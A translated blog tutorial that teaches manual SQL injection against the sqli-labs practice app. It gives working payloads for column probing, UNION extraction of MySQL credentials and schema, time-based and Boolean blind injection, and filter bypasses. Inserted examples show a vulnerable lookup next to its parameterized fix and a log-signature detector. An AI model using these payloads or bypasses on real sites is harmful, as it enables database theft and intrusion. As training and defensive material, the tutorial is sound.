Web security attack and defense: manual SQL injection

1. Principle of SQL injection

1.1 Introduction to SQL Injection

SQL injection occurs when a web application does not validate the legitimacy of user input. The attacker controls a parameter that the front end passes to the back end, and that parameter is substituted into a database query. By constructing different SQL statements, the attacker can perform arbitrary operations on the database.

An SQL injection vulnerability requires two conditions to be met:
a. The parameter is user-controllable.
b. The parameter is brought into the database query: the incoming parameter is spliced into the SQL statement, which is then executed by the database.

1.2 SQL injection hazards

a. Sensitive information in the database is leaked
b. The page is tampered with
c. The database is maliciously operated
d. The server is remotely controlled

1.3 SQL injection classification

a. According to the data type at the injection location, SQL injection can be divided into two types: numeric injection and string injection
b. According to the returned result, it can be divided into error injection and blind injection

1.4 Reasons for SQL injection

a. The data and the code are not strictly separated
b. The parameter data submitted by the user is not fully checked and filtered before being brought into the SQL command, so it changes the original SQL command, which is then executed by the target database

1.5 SQL injection process description

a. Client parameter values and similar data are modified
b. The server does not check or filter the modified data before it is spliced into the SQL command, so the function of the SQL command changes
c. The database engine executes the modified SQL command
d. The client uses the sensitive information obtained in the previous injection to construct the statement for the next injection
e. The server returns the result of the injection to the client

2. Manual SQL injection

2.1 GET and POST requests

a. GET submission: the request data is appended to the URL, with ? separating the URL from the data and multiple parameters joined by &
b. POST submission: the submitted data is placed in the body of the HTTP packet

Difference: data submitted by GET is displayed in the address bar, while with POST the address bar does not change

2.2 Error injection: use a symbol to confirm whether there is an injection point in a GET request

The address in the first figure is http://127.0.0.1/sqli/less-1/?id=1. In the figure below, a ' is appended to the address, so the page displays the error: ''1'' LIMIT 0,1'.
From this the SQL statement can be preliminarily inferred as: select xxx from xxxx where id='1' LIMIT 0,1
and it can be seen that id is the injection point.

2.3 Display error injection: determine the number of columns in the data table with order by

Example URL: http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+
Explanation: in the example, ' closes the quoted value in the original SQL query so that order by 4 can be appended to change the query; -- comments out the rest of the original SQL statement, and + stands for a space

After testing, order by 1, order by 2 and order by 3 all work normally. With order by 4 the page displays Unknown column '4' in 'order clause', so the table queried at this address has 3 columns.

2.4 Display error injection: query the database name, table names, field names and field values through union

2.4.1 Display data account, password, connection IP
SELECT * FROM security.`users` WHERE ID=0 UNION SELECT 1,1,GROUP_CONCAT(HOST,USER,PASSWORD) FROM mysql.`user`

SQL injection method:
http://127.0.0.1/sqli/less-1/?id=0' UNION SELECT 1,1,GROUP_CONCAT(HOST,USER,PASSWORD) FROM mysql.user --+

2.4.2 Display the current table name
SELECT * FROM users WHERE ID=0 UNION SELECT 1,2,DATABASE()

SQL injection method:
http://127.0.0.1/sqli/less-1/?id=0' UNION SELECT 1,2,DATABASE() --+

2.4.3 Query all tables in the current database of the mysql database
SELECT * FROM security.`users` WHERE ID=0 UNION SELECT 1,1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()

SQL injection method:
http://127.0.0.1/sqli/less-1/?id=0' UNION SELECT 1,1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE() --+

2.4.4 Query the specified field in the current database of the mysql database
SELECT * FROM security.`users` WHERE ID=0 UNION SELECT 1,1,GROUP_CONCAT(column_name) FROM information_schema.`COLUMNS` WHERE table_schema=DATABASE() AND table_name='users'

SQL injection method:
http://127.0.0.1/sqli/less-1/?id=0' UNION SELECT 1,1,GROUP_CONCAT(column_name) FROM information_schema.COLUMNS WHERE table_schema=DATABASE() AND table_name='users' --+
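The two conditions of 1.1 and the way the order by probe of 2.3 and the union query of 2.4 change the statement can be reproduced with the vulnerable lookup beside its parameterized fix. This is an added example, not code from the original post or from sqli-labs; the users table and its rows are constructed here, and SQLite stands in for MySQL (it has the same string-splicing problem and the same bound-parameter fix).

```python
import sqlite3

def make_db():
    """Constructed stand-in for the sqli-labs users table (3 columns, as in Less-1)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return con

def vulnerable_lookup(con, user_id):
    """Condition a: user_id is attacker-controlled. Condition b: it is spliced into
    the SQL text, so a quote in it closes the literal and the rest becomes SQL."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as e:
        # Less-1 echoes the database error to the page; that text is what 2.2 and 2.3 read.
        return f"error: {e}"

def safe_lookup(con, user_id):
    """Parameterized query: the driver binds user_id as a value, never as SQL text,
    so the quote, ORDER BY or UNION in a payload are just characters of a bad id."""
    return con.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchall()

if __name__ == "__main__":
    con = make_db()
    for value in ("1", "1' ORDER BY 4 --", "0' UNION SELECT 1,2,'injected' --"):
        print(repr(value), "|", vulnerable_lookup(con, value), "|", safe_lookup(con, value))
```

The vulnerable function leaks the column-count error and the injected row; the parameterized one returns the real row for "1" and nothing at all for the payloads.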

2.5 Blind injection

2.5.1 Introduction to Blind Injection

Blind SQL injection is a type of injection attack in which true-or-false questions are put to the database and the answer is judged from the information the application returns. This attack occurs when the application is configured to display only generic errors, but the code problem that allows SQL injection has not been fixed.

2.5.1 Types of blind injection

a. Boolean-based blind injection
b. Time-based blind injection

2.5.2 GET time-based blind injection

Judge whether the current guess is correct by the time delay of the response

SELECT IF(ASCII(SUBSTR(DATABASE(),1,1))=113,1,SLEEP(5))

In the above SQL statement, SUBSTR(string, start, length) extracts part of a string: here it takes the first letter of the data table name returned by DATABASE(), which is converted to a number with ASCII() and compared against 113. IF(condition, value_if_true, value_if_false) returns 1 when the comparison holds and otherwise calls SLEEP(5).

SQL injection method:
http://127.0.0.1/sqli/less-1/?id=0' UNION IF(ASCII(SUBSTR(DATABASE(),1,1))=115,1,SLEEP(5))--+

2.5.3 GET Boolean-based blind injection

In Boolean-based blind injection, the following method is usually used to guess the length of the database name

SELECT (SELECT LENGTH(DATABASE())>5)

SQL injection method:
http://127.0.0.1/sqli/Less-8/?id=0' or (SELECT LENGTH(DATABASE())>5) --+

SELECT (SELECT ASCII(SUBSTR(DATABASE(),1,1)))>75

SQL injection method:
http://127.0.0.1/sqli/Less-8/?id=0' or (SELECT ASCII(SUBSTR(DATABASE(),1,1)))>75 --+

2.6 POST injection

The injection method is the same as for GET. Generally the POST submission point is an input box on the page rather than the URL bar.

2.6.1 Characteristics of POST requests in error-based injection

1. POST requests cannot be cached
2. POST requests are not saved in the browser history
3. URLs requested by POST cannot be saved as browser bookmarks
4. POST requests have no length limit

3. SQL injection bypass techniques

3.1 Case bypass

For example:
a. AnD 1=1
b. order by can be written as OrdER by to bypass the filter

3.2 Double write bypass

For example:
if the filter replaces union with an empty string, uniunionon becomes union after the replacement; this can also be combined with case bypass

3.3 Encoding bypass

Through URL encoding

3.4 Inline comment bypass

Through SQL comments
such as: /*!select*/ * from users;
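On the defending side, the payload shapes of section 2 (order by probing, union extraction, the SLEEP and ASCII/SUBSTR comparisons of the blind variants) can still be recognised in access logs if the evasions of section 3 are undone first. The following detector is an added example, not code from the original post; the log lines are constructed, the signature names are my own, and the single-pass keyword filter mirrors the kind of blacklist that the double-write bypass in 3.2 defeats.

```python
import re
from urllib.parse import unquote_plus

# Payload shapes from section 2, matched against the normalized query string.
SIGNATURES = [
    ("column-count probe", re.compile(r"\border by \d+")),
    ("union extraction",   re.compile(r"\bunion (all )?select\b")),
    ("time-based blind",   re.compile(r"\bsleep ?\(")),
    ("boolean blind",      re.compile(r"\b(ascii|substr|length) ?\(")),
]

def normalize(raw):
    """Undo the evasions of section 3 so the signatures see plain SQL."""
    text, decoded = raw, unquote_plus(raw)
    while decoded != text:             # 3.3: decode until stable (%2527 -> %27 -> ')
        text, decoded = decoded, unquote_plus(decoded)   # '+' becomes a space, as in --+
    # 3.4: MySQL executes the body of /*!...*/, so keep it; a plain /* */ is dropped.
    text = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", text)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text.lower()).strip()    # 3.1: case bypass

def app_keyword_filter(text):
    # The single-pass blacklist that 3.2 defeats: 'uniunionon' collapses to 'union'.
    return text.replace("union", "")

def classify(query_string):
    """Signature names that match the query, seen both as sent and as it looks
    after the application's own filter, so a double-written keyword is caught."""
    plain = normalize(query_string)
    hits = set()
    for view in (plain, app_keyword_filter(plain)):
        for name, pattern in SIGNATURES:
            if pattern.search(view):
                hits.add(name)
    return sorted(hits)

def scan_access_log(lines):
    """Return (client_ip, hits) for every request whose query string matches."""
    target = re.compile(r'"(?:GET|POST) [^ "?]*\?([^ "]*)')
    findings = []
    for line in lines:
        m = target.search(line)
        if m and (hits := classify(m.group(1))):
            findings.append((line.split()[0], hits))
    return findings

SAMPLE_LOG = [  # constructed Apache-style lines carrying the payloads of sections 2 and 3
    '10.0.0.9 - - [20/Feb/2020:10:00:02 +0800] "GET /sqli/less-1/?id=1%27%20OrdER%20by%204%20--+ HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Feb/2020:10:00:03 +0800] "GET /sqli/less-1/?id=0%27%20uniUNIONon%20/*!select*/%201,2,database()%20--+ HTTP/1.1" 200 640',
    '10.0.0.9 - - [20/Feb/2020:10:00:09 +0800] "GET /sqli/less-8/?id=0%27%20or%20(select%20ascii(substr(database(),1,1)))%3E75%20--+ HTTP/1.1" 200 402',
]
```

Signature matching of this kind is a detection aid only; the spliced query in the application is still fixed by parameterization, not by stripping keywords.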

Origin blog.csdn.net/qq_37697566/article/details/104374321